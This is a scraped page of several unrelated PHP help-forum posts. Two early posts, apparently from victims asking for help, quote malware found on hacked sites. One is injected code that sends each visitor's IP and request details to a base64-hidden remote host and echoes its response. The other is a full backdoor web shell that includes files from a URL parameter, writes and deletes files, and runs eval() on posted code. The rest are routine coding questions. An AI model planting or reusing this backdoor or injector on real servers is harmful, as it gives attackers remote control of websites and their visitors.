PHP - Been Hacked - Now Need Some Advice

The code below was inserted into every single index.php on one of my clients sites.  It went through and every single index.php page (in each folder) had that following code put in.  It was
strange. As far as I can tell there are no FTP logs, besides my own IP.   This site was heavily built by someone else, I have been enhancing the system for a few months but it hasn't undergone a
full security audit yet.  What could have caused this. The weird thing is it's not loading it into the very top of the file..the security.inc.php is my file..and somehow they always get inserted below that file. But the <?
is inserted right after it.  I also don't use generally the <? shorthand, that was his previous code..but that entire <? block that has the hack attempt is very strange.

Any advice on how this is generally done, and anyone with similar issues?
Code: [Select]
<? require_once('security.inc.php'); ?><?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

I have a php form submission on this website: www.judelawllc.com

There are several required fields...and when I try to get around them, I am unable to?? Yet, over the last week...we have been getting upwards of 500 submissions that are completely blank? I don't understand how that is possible...or how to correct it. I have tried to add a captcha to the form to add further protection, but the captcha image is too big for the space I have to put this form. I don't like the layout of this site, but I am stuck with it for now...could you let me know what information I can supply you to help figure out how this is happening?

Thank you in advance!

I found this code added to my server uploaded into a zencart admin folder. We did have some problems previously with index.php and login.php files having some encoded javascript injected into them and mess up our online shop.

If someone could tell me what it does as i accidently launched it before i deleted it. Looked in the server logs and it seems to of accessed every file on the server within seconds.

Code: [Select]
<?php //e6b03bed4190733c7534e5c1209b076f

/**
 * @version 2.42
 * 
 */
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "setup":
                        projectcodes_setup();
                        break;
                case "remove":
                        projectcodes_remove();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        include $code;
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{
        echo $_POST["test_message"];
}

function projectcodes_setup()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $code = base64_decode($projectcode["code"]);
                $res = new_file_put_contents($mark, $code);
                if ($res)
                {
                        $installed[] = $projectcode["id"];
                }
        }
        $installed = serialize($installed);
        $installed = base64_encode($installed);
        echo $installed;
}

function projectcodes_remove()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $res = unlink($mark);

                if ($res)
                {
                        $removed[] = $projectcode["id"];
                }
        }
        $removed = serialize($removed);
        $removed = base64_encode($removed);
        echo $removed;
}

function new_file_put_contents($filename, $data)
{
        $f = @fopen($filename, 'w');
        if (!$f)
        {
                return false;
        }
        else
        {
                $bytes = fwrite($f, $data);
                fclose($f);
                return $bytes;
        }
}

function new_file_get_contents($filename)
/* Returns the contents of file name passed
 */
{
        if (!function_exists('file_get_contents'))
        {
                $fhandle = fopen($filename, "r");
                $fcontents = fread($fhandle, filesize($filename));
                fclose($fhandle);
        }
        else
        {
                $fcontents = file_get_contents($filename);
        }
        return $fcontents;
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);
      
        eval($code);
        //return;
}

?>

Hey guys I have a simple question,

I have a Config.php file that connects to mysql database on my server...

Something like this (modified data, of course):


<?php
// database information
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = '******';
$dbname = 'databasename';
?>

Can a hacker access those variables? How can I protect this?
Ideas, suggestions?

Thanks in advance!

Hey, friends.  I have some trouble on the server front.  My sites have been hacked, and I need to make sure I've eradicated every trace of this exploit.  I'm looking for a way to search for any and all php files contained in multiple directories with specific names.  For instance, I have found a commonality in relation to where these malicious files are placed, such as:
Code: [Select]
/some/dir/img/somename.phpor:
Code: [Select]
/some/dir/js/somename.php
Is there a way I can easily (e.g. using ssh and the "find" command) locate all files ending in php but only found in directories named "img"?  I can't seem to find anything that would allow me to do this with find, or with a combination of find and grep.  I can't go directory by directory, as some of these img directories are created many levels deep, some even in .svn directories. 

Any and all help is appreciated.  Hackers suck.

So here's my problem I'm not sure how to approach this:

I have a table with user_items which are stored together separated by commas.
Code: [Select]
13,12,11,9,27,15,16,22,21,23,24,26,29,30,31,32,33
Now, I have a script where the user is in a trade and I want to verify the item they are trying to trade, but is there an alternative other than grabbing all of that users' items and checking that one item with all of the records?

I've tried using
Code: [Select]
SELECT * FROM MYTABLE WHERE user_item_id IN(33)
As an example to see if it will pull the rows with that ID.  It didn't seem to work, am I doing it wrong? if so, forgive me. Any suggestions/help? The main problem is I don't want to have to explode that data and use a foreach to check that one item against all of that users items, as they could have well over 500.

Right now I have a SESSION so when users flip though pages they carry their info with them, what I'm trying to do now is that userhome.php can't be accesses unless the user just was succesful in cracking there system.. game I'm creating for those of you helping and following me while I do this! it's a virutal hacking simulation and where I'm now is that the user's passwordcracker was compared to the target systems 'systemkey' and either granted him access or didn't, if it did it displayed a progress bar then fowarded to userhome.php where the target users info will lay, right now though if I just type in userhome.php i get there without haveing the crack it.... any ideas?

Hello, can someone please advice me on what scripts I will need to accomplish the following.

I want users to be able to login to their personal page, on there will be items such as pdf files, jpeg files etc, that they will be able to download.

Are there any free scripts out there that can do this, that anyone knows of? I don't mind paying if its a cheapish script for one of you to make for me, but money is a bit tight at the moment so a free script would be my 1st choice...

Thanks for all your help

Hi, basically i have data in my database i want to represent as cash, i currently put the dollar sign infront of each echo which is fine, but how would i go about adding , to the php code itself as you cannot do this from the sql database..

In short i want to use the following code below, when someone selects there option and submits it, it would bring up details from the database on this user from the selected table, can you explain what it would be called doing this so i can look it up, Sorry to be a pain, Cheers.

Code: [Select]
<select name="target2" id="target2">

    <option value=""></option>

  <?php

  $sql = "SELECT player_id, friend_id, name, is_active FROM contacts as c JOIN players as p ON c.friend_id = p.id WHERE c.player_id = $playerID AND is_active = 1 ORDER BY name ASC";

  $que = mysql_query($sql) or die(mysql_error());

  while($list = mysql_fetch_array($que)) {

  ?>

  <option value="<?php echo $list['friend_id'] ?>"><?php echo $list['name'] ?></option>

  <?php } ?>

  </select>

for those of you who don't know i am creating a piece of forum software called ASF. Ive done it by myself so far but as it grows i find it harder to write the code and keep organised. my code is a mess and things arent done the way they should be. So if anyone can give me advice or wants to help i could post some of the files for download. Even if you just want to have a look and let me know waht you think.

Thanks
Carl

http://www.thevault.cz.cc

Hi all,

I am looking as a pet project to develop a review site, with the info stored in a database by id and the information grabbed bet get id and then displayed on a dynamic page, eg review.php?id=1

My question is this, if i throw keywords into the mix for each review, will search engines cache a review like this? Or would I need static pages for google etc to find the info?

Thanks

I have a restricted page for members of a website. This restricted area is within a directory called 'download.'

There is a login form on two pages (home and support pages, found in the main menu). These pages are on the site root directory. When the user successfully logs in they are taken inside the download directory to index.php.

This index.php has a different look to the site root design. I have since redesigned this page to have the same structure as the site root pages.

I would love for the user to able to navigate around the main site if they wanted, and when they clicked support in the menu they would have all the download files there on the page, instead of a login form.

My question is how would I implement this login so that when the user logs in the support page changes from the login page to the page with the files.

I don't want to to duplicate the site within the download directory, I was hoping for an efficient method, but I am unsure how to go about it. 

Hi everyone

This is not really about php code...sorry. But i want some advice if you dont mind. I am working on a system, but i would like it to be available for PC use, aswell as for mobile use. What would be the best? To create two websites, one for mobile other for PC, and upload them to .mobi and .com domains, or should i create only one... I need this to be as user-friendly as possible...because the clients who are going to use this, is those ppl that is not comfortable with a PC, not to mention the web.

Thanks

I am working on adding security to my code. This is new to me and I am confused at which one to use. The numbers, email and pswd are all explanatory its the text fields that are confusing me.

So I have a variety of text fields where the user can input what they want. I want to be able to add in a variety of characters but want it to be secure as well.

I want to be able to use the "&" so I think I want Quote

FILTER_SANITIZE_STRING, FILTER_FLAG_ENCODE_AMP


All the text fields will be used for descriptions or notes.

Also, how secure, if at all, is this function? It was a very earlier attempt at security

function check_input($data)   {
  $data = trim($data);
  $data = htmlspecialchars($data);
  return $data;
}